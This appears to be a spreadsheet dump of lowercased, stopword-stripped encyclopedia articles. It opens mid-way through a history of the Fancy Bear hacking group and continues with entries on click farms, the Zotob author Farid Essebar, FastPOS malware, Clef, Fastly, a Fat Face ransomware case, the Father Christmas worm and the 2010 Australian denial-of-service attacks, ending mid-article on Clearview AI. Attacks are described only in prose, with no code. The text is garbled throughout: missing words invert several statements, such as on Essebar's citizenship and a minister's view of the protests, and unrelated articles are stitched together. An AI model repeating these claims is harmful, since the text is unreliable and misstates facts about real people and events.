united states, ukraine, russia, georgia, syria. only handful republicans targeted, however. analysis 4,700 email accounts attacked fancy bear concluded country russia would interested hacking many different targets seemed nothing else common interest russian government.fancy bear also seems influence political events order friends allies russian government gain power. 2011–2012, fancy bear's first-stage malware "sofacy" sourface implant. during 2013, fancy bear added tools backdoors, including chopstick, coreshell, jhuhugit, advstoreshell. attacks prominent journalists russia, united states, ukraine, moldova, baltics, elsewhere from mid-2014 fall 2017, fancy bear targeted numerous journalists united states, ukraine, russia, moldova, baltics, countries written articles vladimir putin kremlin. according associated press secureworks, group journalists third largest group targeted fancy bear diplomatic personnel u.s. democrats. fancy bear's targeted list includes adrian chen, armenian journalist maria titizian, eliot higgins bellingcat, ellen barry least york times reporters, least foreign correspondents based moscow worked independent news outlets, josh rogin, washington post columnist, shane harris, daily beast writer 2015 covered intelligence issues, michael weiss, security analyst, jamie kirchick brookings institution, media targets ukraine, many kyiv post, reporters covered russian-backed eastern ukraine, well russia majority journalists targeted hackers worked independent news (e.g. novaya gazeta vedomosti) ekaterina vinokurova znak.com mainstream russian journalists tina kandelaki, ksenia sobchak, russian television anchor pavel lobkov, worked dozhd. german attacks (from 2014) fancy bear thought responsible six-month-long cyber-attack german parliament began december 2014. 2020, german federal prosecutors issued arrest warrant dimitri badin relation attacks. attack completely paralyzed bundestag's infrastructure 2015. resolve situation, entire parliament taken offline days. experts estimate total gigabytes data downloaded parliament part attack.the group also suspected behind spear phishing attack august 2016 members bundestag multiple political parties linken-faction leader sahra wagenknecht, junge union saarland. authorities feared sensitive information could gathered hackers later manipulate public ahead elections germany's next federal election september 2017. u.s. military wives' death threats (february 2015) five wives u.s. military personnel received death threats hacker group calling "cybercaliphate", claiming islamic state affiliate, february 2015. this later discovered false flag attack fancy bear, victims' email addresses found fancy bear phishing target list. russian social media trolls also known hype rumor monger threat potential islamic state terror attacks u.s. soil order fear political tension. french television hack (april 2015) april 2015, french television network tv5monde victim cyber-attack hacker group calling "cybercaliphate" claiming ties terrorist organization islamic state iraq levant (isil). french investigators later discounted theory militant islamists behind cyber-attack, instead suspecting involvement fancy bear.hackers breached network's internal systems, possibly aided passwords openly broadcast tv5, overriding broadcast programming company's channels three hours. service partially restored early hours following morning normal broadcasting services disrupted late april various computerised internal administrative support systems including e-mail also still shut otherwise inaccessible attack. hackers also hijacked tv5monde's facebook twitter pages post personal information relatives french soldiers participating actions isis, along messages critical president françois hollande, arguing january 2015 terrorist attacks "gifts" "unforgivable mistake" partaking conflicts "[serve] purpose".the director-general tv5monde, yves bigot, later said attack nearly destroyed company; taken longer restore broadcasting, satellite distribution channels would likely cancel contracts. attack designed destructive, equipment company itself, rather propaganda espionage, case cyber-attacks. attack carefully planned; first known penetration network january 2015. attackers carried reconnaissance tv5monde understand broadcast signals, constructed bespoke malicious software corrupt destroy internet-connected hardware controlled station's operations, encoder systems. they used seven different points entry, part tv5monde even france—one company based netherlands supplied remote controlled cameras used tv5's studios. between february march attackers collected data internal platforms, including internal wiki, verified login credentials still valid. during attack, hackers series commands extracted tacacs logs erase firmware switches routers.although attack purported france's cyber-agency told bigot messages claimed later told evidence found attackers group russian hackers. reason found targeting tv5monde, source order attack, funding known. speculated probably attempt test forms cyber-weaponry. cost estimated ($5.6m; £4.5m) first year, followed recurring annual cost ($3.4m; £2.7m) protection. company's working change, authentication email, checking flash drives insertion, significant detriment efficiency news media company must move information. root9b report (may 2015) security firm root9b released report fancy bear 2015 announcing discovery targeted spear phishing attack aimed financial institutions. report listed international banking institutions targeted, including united bank africa, bank america, bank, bank. according root9b, preparations attacks started june 2014 malware used "bore specific signatures historically unique organization, sofacy." security journalist brian krebs questioned accuracy root9b's claims, postulating attacks actually originated nigerian phishers. june 2015 well respected security researcher claudio guarnieri published report based investigation concurrent sofacy attributed exploit german bundestag credited root9b reported, "the address used command control server attack bundestag (176.31.112.10)", went based examination bundestag attack, least some" indicators contained within root9b's report appeared accurate, including comparison hash malware sample incidents. root9b later published technical report comparing claudio's analysis sofacy attributed malware sample, adding veracity original report. spoof, white house nato attack (august 2015) august 2015, fancy bear used zero-day exploit java, spoofing electronic frontier foundation launching attacks white house nato. hackers used spear phishing attack, directing emails false electronicfrontierfoundation.org. world anti-doping agency (august 2016) august 2016, world anti-doping agency reported receipt phishing emails sent users database claiming official wada communications requesting login details. after reviewing domains provided wada, found websites' registration hosting information consistent russian hacking group fancy bear. according wada, data hackers released forged.due evidence widespread doping russian athletes, wada recommended russian athletes barred participating 2016 olympics paralympics. analysts said believed hack part retaliation whistleblowing russian athlete yuliya stepanova, whose personal information released breach. august 2016, wada revealed systems breached, explaining hackers fancy bear used international olympic committee (ioc)-created account gain access anti-doping administration management system (adams) database. hackers used website fancybear.net leak said olympic drug testing files several athletes received therapeutic exemptions, including gymnast simone biles, tennis players venus serena williams basketball player elena delle donne. hackers honed athletes granted exemptions wada various reasons. subsequent leaks included athletes many countries. dutch safety board bellingcat eliot higgins journalists associated bellingcat, group researching shooting malaysia airlines flight ukraine, targeted numerous spearphishing emails. messages fake gmail security notices bit.ly tinycc shortened urls. according threatconnect, phishing emails originated servers fancy bear used previous attacks elsewhere. bellingcat known demonstrated russia culpable shooting mh17, frequently derided russian media.the group targeted dutch safety board, body conducting official investigation crash, release board's final report. they fake sftp servers mimic board's servers, likely purpose spearphishing usernames passwords. spokesman said attacks successful. democratic national committee (2016) fancy bear carried spear phishing attacks email addresses associated democratic national committee first quarter 2016. march phishing emails mainly directed email addresses 2008 democratic campaign staffers began arrive. accounts yielded date contact lists. next day, phishing attacks expanded non-public email addresses high level democratic party officials. hillaryclinton.com addresses attacked, required factor authentication access. attack redirected towards gmail accounts march podesta's gmail account breached day, 50,000 emails stolen. phishing attacks intensified april, although hackers seemed become suddenly inactive april russia holiday honor military's electronic warfare services. malware used attack sent stolen data servers used group's 2015 attack german parliament.on june crowdstrike released report publicizing hack identifying fancy bear culprits. online persona, guccifer 2.0, appeared, claiming sole credit breach.another sophisticated hacking group attributed russian federation, nicknamed cozy bear, also present dnc's servers time. however groups appeared unaware other, independently stole passwords otherwise duplicated efforts. cozy bear appears different agency, interested traditional long-term espionage. crowdstrike forensic team determined cozy bear dnc's network year, fancy bear weeks. ukrainian artillery according crowdstrike 2014 2016, group used android malware target ukrainian army's rocket forces artillery. they distributed infected version android whose original purpose control targeting data d-30 howitzer artillery. app, used ukrainian officers, loaded x-agent spyware posted online military forums. crowdstrike initially claimed ukrainian d-30 howitzers destroyed war, highest percentage loss artillery pieces army percentage never previously reported would mean loss nearly entire arsenal biggest artillery piece ukrainian armed forces). according ukrainian army crowdstrike's numbers incorrect losses artillery weapons "were reported" losses "have nothing stated cause". crowdstrike since revised report international institute strategic studies (iiss) disavowed original report, claiming malware hacks resulted losses 15–20% rather original figure 80%. windows zero-day (october 2016) october 2016, google's threat analysis group revealed zero-day vulnerability microsoft windows versions subject active malware attacks. november 2016, microsoft executive vice president windows devices group terry myerson posted microsoft's threat research response blog, acknowledging vulnerability explaining "low-volume spear-phishing campaign" targeting specific users utilized "two zero-day vulnerabilities adobe flash down-level windows kernel." microsoft pointed fancy bear threat actor, referring group in-house code name strontium. dutch ministries (february 2017) february 2017, general intelligence security service (aivd) netherlands revealed fancy bear cozy bear made several attempts hack dutch ministries, including ministry general affairs, previous months. bertholee, head aivd, said eenvandaag hackers russian tried gain access secret government documents.in briefing parliament, dutch minister interior kingdom relations ronald plasterk announced votes dutch general election march 2017 would counted hand. iaaf hack (february 2017) officials international association athletics federations (iaaf) stated april 2017 servers hacked "fancy bear" group. attack detected cybersecurity firm context information security identified unauthorised remote access iaaf's servers taken place february iaaf stated hackers accessed therapeutic exemption applications, needed medications prohibited wada. german french elections (2016–2017) researchers trend micro 2017 released report outlining attempts fancy bear target groups related election campaigns emmanuel macron angela merkel. according report, targeted macron campaign phishing attempting install malware site. french government cybersecurity agency anssi confirmed attacks took place, could confirm apt28's responsibility. marine pen's campaign appear targeted apt28, possibly indicating russian preference campaign. putin previously touted benefits russia marine elected.the report says targeted german konrad adenauer foundation friedrich ebert foundation, groups associated angela merkel's christian democratic union opposition social democratic party, respectively. fancy bear fake email servers late 2016 send phishing emails links malware. international olympic committee (2018) january 2018, "fancy bears hack team" online persona leaked appeared stolen international olympic committee (ioc) u.s. olympic committee emails, dated late 2016 early 2017, leaked apparent retaliation ioc's banning russian athletes 2018 winter olympics sanction russia's systematic doping program. attack resembles earlier world anti-doping agency (wada) leaks. known whether emails fully authentic, fancy bear's history salting stolen emails disinformation. mode attack also known, probably phishing.cyber security experts also claimed attacks also appear targeting professional sports drug test bottling company known berlinger group. swedish sports confederation swedish sports confederation reported fancy bear responsible attack computers, targeting records athletes' doping tests. united states conservative groups (2018) software company microsoft reported august 2018 group attempted steal data political organizations international republican institute hudson institute think tanks. attacks thwarted microsoft security staff control domains. announcement microsoft advised currently evidence domains used successful attacks transferred control them, evidence indicate identity ultimate targets planned attack involving domains". ecumenical patriarchate clergy (august 2018) according august 2018 report associated press, fancy bear years targeting email correspondence officials ecumenical patriarchate constantinople headed ecumenical patriarch bartholomew publication appeared time heightened tensions ecumenical patriarchate, seniormost eastern orthodox churches, russian orthodox church (the moscow patriarchate) issue full ecclesiastical independence (autocephaly) orthodox church ukraine, sought ukrainian government. publication cited experts saying grant autocephaly church ukraine would erode power prestige moscow patriarchate would undermine claims transnational jurisdiction. cyber attacks also targeted orthodox christians countries well muslims, jews catholics united states, ummah, umbrella group ukrainian muslims, papal nuncio kiev yosyp zisels, directs ukraine's association jewish organizations communities. indictments 2018 october 2018, indictment u.s. federal grand jury seven russian men, officers, relation attacks unsealed. indictment states december 2014 least 2018, officers conspired conduct "persistent sophisticated computer intrusions affecting u.s. persons, corporate entities, international organizations, respective employees located around world, based strategic interest russian government." u.s. department justice stated conspiracy, among goals, aimed publicize stolen information part influence disinformation campaign designed undermine, retaliate against, otherwise delegitimize" efforts world anti-doping agency, international anti-doping organization published mclaren report, report exposed extensive doping russian athletes sponsored russian government. defendants charged computer hacking, wire fraud, aggravated identity theft, money laundering. 2019 think tank attacks february 2019, microsoft announced detected spear-phishing attacks apt28, aimed employees german marshall fund, aspen institute germany, german council foreign relations. hackers group purportedly sent phishing e-mails email addresses across europe attempt gain access employer credentials infect sites malware. 2019 strategic czech institution 2020, czech national cyber information security agency reported cyber-espionage incident unnamed strategic institution, possibly ministry foreign affairs, likely carried fancy bear. 2020 norwegian parliament attack august 2020 norwegian storting reported "significant cyber attack" e-mail system. september 2020, norway's foreign minister, marie eriksen søreide, accused russia attack. norwegian police security service concluded december 2020 "the analyses show likely operation carried cyber actor referred open sources apt28 fancy bear," "sensitive content extracted affected email accounts.". characteristics techniques fancy bear employs advanced methods consistent capabilities state actors. they spear phishing emails, malware drop websites disguised news sources, zero-day vulnerabilities. cybersecurity research group noted different zero-day exploits 2015, technical feat would require large numbers programmers seeking previously unknown vulnerabilities top-of-the-line commercial software. this regarded sign fancy bear state-run program gang lone hacker.one fancy bear's preferred targets web-based email services. typical compromise consist web-based email users receiving email urgently requesting change passwords avoid hacked. email contain link spoof website designed mimic real webmail interface, users attempt login credentials stolen. often obscured shortened bit.ly link order past spam filters. fancy bear sends phishing emails primarily mondays fridays. they also send emails purportedly containing links news items, instead linking malware drop sites install toolkits onto target's computer. fancy bear also registers domains resemble legitimate websites, create spoof site steal credentials victims. fancy bear known relay command traffic proxy networks victims previously compromised.software fancy bear used includes advstoreshell, chopstick, jhuhugit, xtunnel. fancy bear utilises number implants, including foozer, winids, x-agent, x-tunnel, sofacy, downrange droppers. based compile times, fireeye concluded fancy bear consistently updated malware since 2007. avert detection, fancy bear returns environment switch implants, changes command control channels, modifies persistent methods. threat group implements counter-analysis techniques obfuscate code. they junk data encoded strings, making decoding difficult without junk removal algorithm. fancy bear takes measures prevent forensic analysis hacks, resetting timestamps files periodically clearing event logs.according indictment united states special counsel, x-agent "developed, customized, monitored" lieutenant captain nikolay yuryevich kozachek.fancy bear known tailor implants target environments, instance reconfiguring local email servers. august 2015, kaspersky detected blocked version advstoreshell implant used target defense contractors. hour half following block, fancy bear actors compiled delivered backdoor implant. education unit 26165 involved design curriculum several moscow public schools, including school 1101. related personas fancy bear sometimes creates online personas disinformation, deflect blame, create plausible deniability activities. guccifer online persona first appeared claimed responsibility hacks story broke fancy bear responsible. guccifer claims romanian hacker, interviewed motherboard magazine, asked questions romanian appeared unable speak language. some documents released appear forgeries cobbled together material previous hacks publicly available information, salted disinformation. fancy bears' hack team website created leak documents taken wada iaaf attacks fronted brief manifesto dated september 2016, proclaiming site owned "fancy bears' hack team", said "international hack team" "stand fair play clean sport". site took responsibility hacking wada promised would provide "sensational proof famous athletes taking doping substances", beginning olympic team, said "disgraced name tainted victories". wada said documents leaked name forgeries, data changed. anonymous poland twitter account named "anonymous poland" (@anpoland) claimed responsibility attack world anti-doping agency released data stolen court arbitration sport, secondary target. threatconnect supports view anonymous poland sockpuppet fancy bear, noting change historical focus internal politics. screen capture video uploaded anonymous poland shows account polish language settings, browser history showed made searches google.ru (russia) google.com (us), google.pl (poland). also btc-e cyberwarfare russia dmitri sergeyevich badin russian espionage united states russia involvement regime change trolls olgino sandworm team, term used refer unit 74455 plot hack america notes according cybersecurity firm fireeye, fancy bear uses suite tools frequently updated since 2007 perhaps even 2004. trend micro said trace activities pawn storm back 2004. aleksei sergeyevich morenets (моренец алексей сергеевич), evgenii mikhaylovich serebriakov, ivan sergeyevich yermakov (ермаков иван сергеевич), artem andreyevich malyshev (малышев артём андреевич), dmitriy sergeyevich badin (бадин дмитрий сергеевич, oleg mikhaylovich sotnikov (олег михайлович сотников), alexey valerevich minin (алексей валерьевич минин). references external links "microsoft security intelligence report: strontium". microsoft malware protection center. november 2015.</t>
  </si>
  <si>
    <t>Click farm</t>
  </si>
  <si>
    <t>click farm form click fraud large group low-paid workers hired click paid advertising links click fraudster (click farm master click farmer). workers click links, surf target website period time, possibly sign newsletters prior clicking another link. many workers, clicking enough increase revenue substantially also alternative types work. extremely difficult automated filter detect simulated traffic fake visitor behavior appears exactly actual legitimate visitor.fake likes generating click farms essentially different arising bots computer programs written software experts. deal issues, companies facebook trying create algorithms seek wipe accounts unusual activity (e.g. liking many pages short period time). logistics click farms usually located developing countries, china, india, nepal, lanka, egypt, indonesia, philippines, bangladesh. business click farms extends generating likes followers social media platforms facebook, twitter, instagram, pinterest more. workers paid, average, dollar thousand likes following thousand people twitter. then click farms turn around sell likes followers much higher price.in thailand june 2017, click farm discovered hundreds mobile phones several hundred thousand cards used build likes views wechat.as well inflating engagement social media, click farms used click fraud fraud practices. this includes inflating clicks traffic websites publishers collect fraudulent payout. this traffic also hired damage paid campaigns business rivals, known competitor click fraud.click farms also used increase views everything spotify, twitch youtube creating fake reviews businesses, products services. many click farms advertise openly internet, usually masquerading genuine traffic sources. need click farming arises because, guardian states, "31% check ratings reviews, including likes twitter followers, choose something." this shows increasing importance businesses, celebrities organisations number likes followers have. this creates monetary values likes followers means businesses celebrities feel compelled increase likes create positive online profile. pay-per-click providers, including google, yahoo!, msn, made substantial efforts combat click fraud. automated filters remove click fraud attempts source. deanna yick, spokeswoman mountain view, california-based google, said design systems catch bot-related attacks.” “because significant amount malicious traffic automated, advertisers protected kinds attacks.” added. effort circumvent filtering systems, click fraudsters begun click farms mimic actual visitors. implications engagement rate, performance metric measures quality social media activity facebook likes twitter retweets, interpreted terms "engagement follower," measured dividing counts social media activity number followers. users engage short term click farms services engagement rate plummet time initial increase volume social media activity drops click farms services end, coupled increase fake followers same.italian security researchers bloggers andrea stroppa carla micheli found 2013 million $360 million date earned sale potential benefits buying fake twitter followers. $200 million year also earned fake facebook activities. about percent facebook advertisements bought pay-per-click basis. advertisers claimed percent facebook clicks invalid tried seek refunds. this could cost facebook $2.5 billion 2014 revenue.some companies tried mitigate effects click farming. coca-cola made 2010 super bowl advert "hard times" private learning shared shareyt issued statement "did approve fake fans." hasbro alerted online casino, sub-licensee monopoly brand added fake facebook likes hence contacted facebook remove site. hasbro issued statement “appalled hear occurred” claimed previous knowledge page.although click farm services violate many social media user policies, government regulations render illegal. however, desilva, lawyer specializing outsourcing manches oxford mentioned that: "potentially, number laws breached consumer protection unfair trading regulations. effectively misleading individual consumers." advertising provider responses facebook issued statement stating: like come someone truly interested connecting brand benefits one. facebook page someone offers boost count return money, advice walk away least rules good chance likes deleted automatic systems. investigate monitor "like-vendors" find selling fake likes, generating conversations fake profiles, quickly block platform." andrea faville reported alphabet inc. companies, google youtube, "take action actors seek game systems." linkedin spokesman doug madey said buying connections "dilutes member experience violates user agreement also prompt account closures." chief executive founder instagram, kevin systrom reports "we've deactivating spammy accounts instagram ongoing basis improve experience."facebook's purging fake likes accounts occurred august september 2012. according facebook's 2014 financial report securities exchange commission, estimated million false accounts deleted, accounting approximately 6.4% billion total accounts facebook. likester reported pages affected include lady gaga, lost 65,505 fans facebook, lost 124,919 fake likes. technology giant dell lost 107,889 likes (2.87% total likes) hours. billions youtube video fake views deleted exposed auditors. december 2014, instagram carried purge deemed "instagram rapture" wherein many accounts affected—including instagram's account, lost 18,880,211 followers. also link farm content farm references</t>
  </si>
  <si>
    <t>Farid Essebar</t>
  </si>
  <si>
    <t>farid essebar (arabic: فريد الصبار) (born 1987, known diabl0) moroccan black hacker. people (along turk atilla ekici) behind spread zotob computer worm targeted windows 2000 operating systems 2005. among affected cnn, news, york times, caterpillar, united parcel service, boeing also united states department homeland security. microsoft used investigators $250,000 reward capture hacker(s). microsoft's general counsel declared august 2005 "the fact able arrests less weeks halfway around world really drives point home." essebar russian citizen, also. arrest intentions believed intention facilitate credit card forgery scams. believes atilla ekici paid farid essebar code worm. other accusations july 2006, investigators stated essebar authored viruses. 2014 arrest march 2014, essebar arrested thailand 2-year investigation thai police. investigation triggered complaint swiss authorities alleged infiltration swiss bank caused dozens billions dollars' damage. trial september 2006, moroccan court sentenced essebar years prison. reduced year december 2006. notes</t>
  </si>
  <si>
    <t>FastPOS</t>
  </si>
  <si>
    <t>fastpos variant malware discovered trend micro researchers. malware foregrounds speed credit card data stolen sent back hackers. history researchers trend micro named malware variant tspy_fastpos.smztda. malware used hackers target small mid-sized businesses (smbs) many countries like france, taiwan, japan, brazil, hong kong united states. operation unlike malware, fastpos store information locally send cyber thieves periodically. variant malware executes attack target infected websites virtual network computing (vnc) file sharing service. stolen data instantly transferred control command server hardcoded hacker. malware consists components– keylogger scraper. logged keystrokes stored memory transmitted attacker enter pressed stored file infected system. stolen data user credentials, payment information depends business procedures. scraper devised steal credit card data. memory scraper designed verify service code credit card help remove cards demands pins. also point-of-sale malware cyber security standards list cyber attack threat trends references</t>
  </si>
  <si>
    <t>Clef (app)</t>
  </si>
  <si>
    <t>clef francisco-based technology company, known developing mobile created two-factor authentication websites. allowed users access sites single login password management service stores encrypted passwords private accounts. standard verification method requires access data mobile phone confirm user's identity. application required wi-fi mobile network, user could scanning computer screen phone. history clef founded 2013 mark hudnall, byrne jesse pollak. raised $1.6 million seed funding november 2014. clef integrated many websites applications, including wordpress. march 2017, clef announced would longer support plugin june 2017; clef acquired authy, another service, later acquired twilio. references</t>
  </si>
  <si>
    <t>Fastly</t>
  </si>
  <si>
    <t>fastly american cloud computing services provider. describes network edge cloud platform, designed help developers extend core cloud infrastructure edge network, closer users. fastly edge cloud platform includes content delivery network (cdn), image optimization, video streaming, cloud security, load balancing services. fastly's cloud security services include denial-of-service attack protection, mitigation, application firewall. fastly's application firewall uses open application security project modsecurity core rule alongside ruleset. fastly platform built varnish. december 2021, fastly transfers 50-100tbps data. history fastly founded 2011 swedish-american entrepreneur artur bergman, previously chief technical officer wikia (now fandom). june 2013, fastly raised million series funding. april 2014, company announced acquired sumo, add-on heroku. september 2014, fastly raised million series funding, followed million series round august 2015.in september 2015, google partnered fastly content delivery network providers offer services users. april 2017, fastly launched edge cloud platform along image optimization, load balancing, application firewall.fastly raised million funding april 2017, another million july 2018. company filed initial public offering (ipo) april 2019 debut york stock exchange 2019. february 2020, bergman stepped assumed role chief architect executive chairperson; joshua bixby took role.in august 2020, fastly announced acquiring cybersecurity company signal sciences $775 million ($200 million cash $575 million stock).in june 2021, ronald kisling, previously employed alphabet fitbit division, hired serve fastly's cfo, succeeding adriel lares. assumed position august 2021.in 2022, fastly announced acquired glitch, coding platform million developers.in august 2022, todd nightingale, previously employed cisco executive vice president enterprise networking cloud business, hired serve fastly's ceo, succeeding joshua bixby. operation fastly's service follows reverse proxy model, routing website traffic servers instead providing 'cdn.mydomain.com' address store site-specific files. fetches content point presence nearest location requesting user, nearly worldwide. priced pay-as-you-go service subject us$50 month minimum charge, bandwidth charged variable rates depending region. content directly uploaded servers, rather pulled periodically origin server cached order reduce time required end-user access content.fastly supports based http/3 protocol, well enabled content, encryption secure tokens restrict media access.on june 2021, fastly reported problems service caused many major websites, reddit, gov.uk, twitch, spotify amazon, along major news sources york times, guardian, bbc, become unavailable. affected tech news outlet verge resorted using google docs report ongoing outage. also affected certain parts major websites, servers hosting emojis used twitter, resulting becoming inaccessible. outage resolved fastly hours. fastly since stated cause outage software triggered specific user configuration. references external links official website business data fastly, inc.:</t>
  </si>
  <si>
    <t>Fat Face</t>
  </si>
  <si>
    <t>face british lifestyle clothing accessories retailer, based hampshire. founded 1988 slade jules leaver business selling t-shirts resorts. company opened first retail shop 1993; 2014 face stores ireland. history business founded 1988 french resort méribel slade, former policeman, business graduate jules leaver. pair bought t-shirts wholesale, printed designs specific resort, sold skiers slopes first using proceeds fund skiing. they spent following years travelling different resorts, continued produce sell outdoor-related clothing. 1993 opened first shop, london's fulham road; named "fat face" face bellevarde slope val-d'isère. 2000, sold company livingbridge million. 2005 advent international, private equity company, bought livingbridge's interest fatface.in 2007 face acquired, £360 million, private equity group bridgepoint capital; sale netted slade leaver million. company's sales badly great recession, forcing bridgepoint write half company's value, improved 2010 2011, face returned small profit 2012. bridgepoint planned float quarter company london stock exchange 2014, hoping raise £110 million, later cancelled flotation lack confidence prospective stockholders.the chief executive evans, joined march 2019 replacing anthony thompson. evans previously oasis/warehouse. 2013 bridgepoint hired former marks spencer chief executive stuart rose fatface's chairman; rose replaced alan giles chairman.in march 2021 face revealed customers staff subject ransomware attack january 2021 paid million ransom conti cyber criminals unlock encrypted data.in september 2021, evans stepped replaced will crumbie. point, crumbie business eight years cfo. before fatface held senior financial executive positions within walgreen boots alliance group p&amp;o. references external links official website website</t>
  </si>
  <si>
    <t>Father Christmas (computer worm)</t>
  </si>
  <si>
    <t>father christmas worm, also known hi.com worm, computer worm used decnet attack vax/vms systems. released december 1988. worm send christmas greeting "father christmas" affected system. history around 17:00 december 1988, worm detected space physics analysis network (span). this nasa network decnet internet many connections networks hepnet. majority computers span computers running vax/vms operating system. worm originated computer decnet switzerland person using multi-user login name phsolide. infection thought spread 6,000 computer nodes.on december email went warn span centre managers worm released onto span. purpose worm create file entitled "hi.com" prior december half past midnight day, designed send message father christmas users local rights database network. exclusively targeted vax/vms systems, perform actions sending message. recommended strategy prevent infection time create empty "hi.com" file would stop worm able create version file. subsequently estimated infected devices launched worm.the father christmas worm effect strengthening security measures span decnet internet. this proved january 1989, nearly identical worm released easynet intranet. network manager able quickly prevent spread worm exposure father christmas worm previous month. also wank worm notes references green, james sisson, patricia (june 1989). "the "father christmas" worm" (pdf). 12th national computer security conference proceedings. retrieved november 2015. nazario, (2004). defense detection strategies against internet worms. boston, artech house. isbn 9781580537735. external links "official 'father christmas' worm report"</t>
  </si>
  <si>
    <t>February 2010 Australian cyberattacks</t>
  </si>
  <si>
    <t>february 2010 australian cyberattacks series denial-of-service attacks conducted anonymous online community australian government response proposed censorship regulations. operation titstorm name given cyber attacks perpetrators. they resulted lapses access government websites february 2010. this accompanied emails, faxes, phone calls harassing government offices. actual size attack number perpetrators involved unknown estimated number systems involved ranged hundreds thousands. amount traffic caused disruption multiple government websites. australian telecommunications minister stephen conroy proposed regulations would mainly filter sites pornographic content. various groups advocating uncensored access internet, along companies like google yahoo!, object proposed filter. spokesperson conroy said actions legitimate form protest called irresponsible. attacks also drew criticism filter protest groups. initial stage followed small in-person protests february called "project freeweb". background attack began protest responding plan australian telecommunications minister stephen conroy would require internet service providers block australian users accessing illegal government deemed "unwanted" content. websites blocked feature pornography showing rape, bestiality, child abuse, small-breasted women (who appear legal age), female ejaculation. drawn depictions acts included proposal. proposed filter also includes gambling sites along others showing drug use. leaked version proposed blacklist (also referred "refused classification" "rc" list) also showed sites include adult content. name "operation titstorm" reference material would censored.google questioned proposal, saying prohibitions would broad. strongly opposed free speech groups. poll conducted mcnair ingenuity research hungry beast television program found 1,000 respondents favour concept plan. survey also found concerned government's intent keep list filtered websites secret.the department defence's cyber security operations centre discovered attack coming february. statement released anonymous press days attack said, government right refuse citizens access information solely perceive 'unwanted'." went read, "the australian government learn mess porn. messes access perfectly legal illegal) content reason". anonymous previously garnered media attention protests church scientology (project chanology) iranian government. september 2009, prime minister kevin rudd's website hacked similar protest proposed censorship reforms. attacks flyers distributed recruit participants said attack begin aest february. day, government websites targeted denial-of-service attacks. communications department said hackers infiltrated government security, instead swamped government computer servers. sites left unavailable sporadic periods throughout attack. point, australian parliament's website offline days high volume requests. rudd's government site also inaccessible time. primary target, communications department also received large amount traffic. government offices also flooded e-mail spam, junk faxes, prank phone calls. prime minister's homepage vandalized pornographic images. flyer released attack called faxes focus cartoon pornography, female ejaculation, small-breasted pornography.reports actual size attack varied. cyber security expert described attacks "the equivalent parking truck across driveway shopping centre". firm marketing security technology said peak attack relatively 16.84 megabits second. writer described million requests second initially brought parliament website "massive". site usually receives hundred second. appears botnets made compromised computers used. estimates number attacking systems involved ranged hundreds thousands. response spokeswoman conroy said attacks legitimate political protest. according her, "totally irresponsible potentially deny services australian public". systems administrators guild australia said "condemned ddos attacks wrong express disagreement proposed law". anti-censorship groups criticised attacks, saying hurt cause. purported spokesperson attackers recommended wider australian public protest filter signing petition electronic frontiers australia.anonymous coordinated second phase small protests outside parliament house canberra major cities throughout australia february. additional demonstrations held country's embassies overseas. organizers called follow-up protests "project freeweb" differentiate criticised cyber attacks.several supporters attack later said messageboard taking websites enough convince government back filtering policy called violence. others disagreed actions proposed launching additional attack popular government site. spokesman electronic frontiers australia said believed real intention capacity follow violent threats.the attack also resulted criticism australia's terrorism laws university south wales journal. writer wrote provisions leave place legitimate acts online protest, least sets penalty high relatively minor cyber-vandalism".an australian teenager charged four counts inciting hackers impair electronic communications unauthorised access restricted data role attack. ordered bond instead convicted pleading guilty showing good behaviour.in july 2010, conroy delayed implementing plan pending 12-month review refused classification content rated. proposal expected forward opposition coalition greens. internet service providers telstra optus agreed voluntarily block content. also internet censorship australia operation payback references further reading</t>
  </si>
  <si>
    <t>Clearview AI</t>
  </si>
  <si>
    <t>clearview american facial recognition company, providing software companies, enforcement, universities, individuals. company's algorithm matches faces database billion images indexed internet, including social media applications. founded hoan ton-that richard schwartz, company maintained profile late 2019, usage enforcement reported multiple reports identified clearview's association far-right personas dating back 2016, company claimed sever ties employees.in january 2020, twitter sent cease desist letter requested deletion collected data. this followed similar actions youtube (via google) facebook february. clearview sells access database enforcement agencies 3,100 active users including federal bureau investigation department homeland security according wall street journal. however, contrary clearview's claims service sold enforcement, data breach early 2020 revealed numerous commercial organizations clearview's customer list. spokesperson company claimed valuation $100 million. 2021, time magazine named clearview influential companies year. march 2022 clearview fined $20m italian privacy regulator ("garante della privacy") violation gdpr required delete italian records database history clearview operated near secrecy release york times exposé titled "the secretive company that might privacy know january 2020. citing article, tech civil rights organizations including color change, council american–islamic relations, demand progress, electronic frontier foundation, electronic privacy information center, fight future, freedom press foundation, media alliance, national center transgender equality, national hispanic media coalition, national lgbtq task force, project government oversight, restore fourth, surveillance technology oversight project, woodhull freedom foundation sent letter privacy civil liberties oversight board (pclob) four congressional committees, outlining concerns facial recognition clearview, asking pclob suspend facial recognition. exposé also identified hoan ton-that richard schwartz company's founders investors including peter thiel. reported ton-that schwartz manhattan institute.early clearview's described perk given potential investors series fundraising round. billionaire john catsimatidis used identify someone daughter dated piloted gristedes grocery market york city identify shoplifters. noted far-right "troll king" charles johnson account clearview well ekeland palmer luckey. institute linked clearview banjo surveillance platform, far-right ties, though banjo explicit far-right algorithmic goals clearview does.it accelerated global debate regulation facial recognition technology governments enforcement. enforcement officers stated clearview's facial recognition superior identifying perpetrators angle previously used technology. after discovering clearview scraping images site, twitter sent cease-and-desist letter, insisting remove images twitter's policies. facebook said reviewing situation, venmo also stated policies. february 2020, google, youtube, facebook, venmo sent cease desist letters policies. ton-that responded interview errol barnett this morning first amendment right access public data, identification results 99.6% accurate. later stated clearview scraped billion images across web.in february 2020, multiple sources reported clearview experienced data breach, exposing list customers. clearview's attorney, ekeland stated flaw corrected.in april 2020, techcrunch reported mossab hussein spidersilk, security firm, discovered clearview's source code repositories exposed misconfigured user security setting. this included secret keys credentials, including cloud storage slack tokens. compiled apps pre-release apps accessible, allowing hussein macos apps clearview's services. while ton-that called hussein's disclosure extortion, hussein reported breach clearview refused sign non-disclosure agreement necessary program. also found 70,000 videos storage bucket rudin management apartment building's entrance.a huffington post story published april 2020 identified slack channel 2016 created charles johnson dickinson called wesearchr taken crowd-funding site name. channel members included ton-that, schwartz, marko jukic, tyler bass douglass mackey worked smartcheckr, clearview's original name rebranding. mackey associated alt-right white supremacist congressional candidate paul nehlen. clearview claimed knowledge mackey's persona, though mackey also part wesearchr slack fake name. after mackey's persona revealed, schwartz used reputation management company obscure involvement smartcheckr.in september 2020, reported clearview raised $8.625 million equity sales funding round. company's filing disclose investors round. before deal, clearview raised total $8.4 million investors including kirenaga partners peter thiel. after 2021 storming united states capitol, oxford police department alabama used clearview's software number images posted federal bureau investigation public request suspect information generate leads people present riot. photo matches information sent declined comment techniques.in december 2020, 